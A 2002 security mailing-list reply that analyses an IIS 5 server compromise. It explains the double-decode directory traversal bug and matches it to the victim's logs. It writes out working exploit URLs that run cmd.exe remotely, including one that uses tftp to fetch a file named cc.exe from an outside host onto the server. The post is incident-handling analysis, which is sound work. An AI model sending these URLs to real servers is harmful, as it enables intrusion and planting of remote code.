Re: Can anyone identify this backdoor?

[Matt Scarborough <vexversa () verizon net>]

On Thu, 11 Jul 2002 10:09:28 -0500, "Matt Andreko" wrote 

> I have been asked by many to see the logs.  I have also posted them to
> the website at http://www.criminalsmostly.com/~mandreko/logs.zip (didn't
> want to post a really really long post)
>
> I appreciate all the responses I'm getting, I'm finding out more that I
> did not know about this little file.  I'm mainly trying to figure out
> how it got there, and where it came from.

On an unrelated note, this server is Windows 2000 and not vulnerable to the
HK.EXE exploit (patched by MS00-003.) Richard Bartlett's descriptions of the
toolkit seem a likely explanation.

As to how cc.exe got there, the logs referenced above show the server
vulnerable to the double-decode bug (patched by MS01-026.)

For example
HTTP://<IP_ADDR>/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c: 
will leave a 200 response from IIS 5 in the logs and actually transfer the
file CMD.EXE to the attacker. This behavior is a change from the Unicode bug
(patched by MS00-086) which would have returned a directory listing to the
attacker.

Additionally, the familiar
HTTP://<IP_ADDR>/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+cmd2.exe
will leave a 502 response from IIS 5 in the logs, and output to the attacker

CGI Error

The specified CGI application misbehaved by not returning a complete set of
HTTP headers. The headers it did return are:

        1 file(s) copied.

The attack URLs above sent to a double-decode bug vulnerable server are
consistent with your ex020522.log

#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-05-22 12:05:49
#Fields: time c-ip cs-method cs-uri-stem sc-status 
<snip>
12:05:49 212.179.250.122 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 502
12:05:52 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 200
12:06:55 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 502
12:07:20 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 502
12:10:51 212.179.250.122 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 502

As such, the attack URL
HTTP://<IP_ADDR>/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+tftp+-i+<IP_ADDR>+GET+cc.exe+C:\winnt\system32\cc.exe
could have transferred the file cc.exe to the victim server using TFTP.
Since you are not logging cs-uri-queries we may not be sure what commands
successfully returned the 200 or 502 responses.

As preliminary guesswork only, most of the other logs indicate automated
tools (several requests within the span of a second or two.) The compromise
*seems* to have been mounted from the same ADSL netblock. Inspection of the
logs *seems* to reveal an automated tool first, run on two successive days,
followed by manual attack --- all originating from that same IP block.

Matt Scarborough 2002-07-12

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com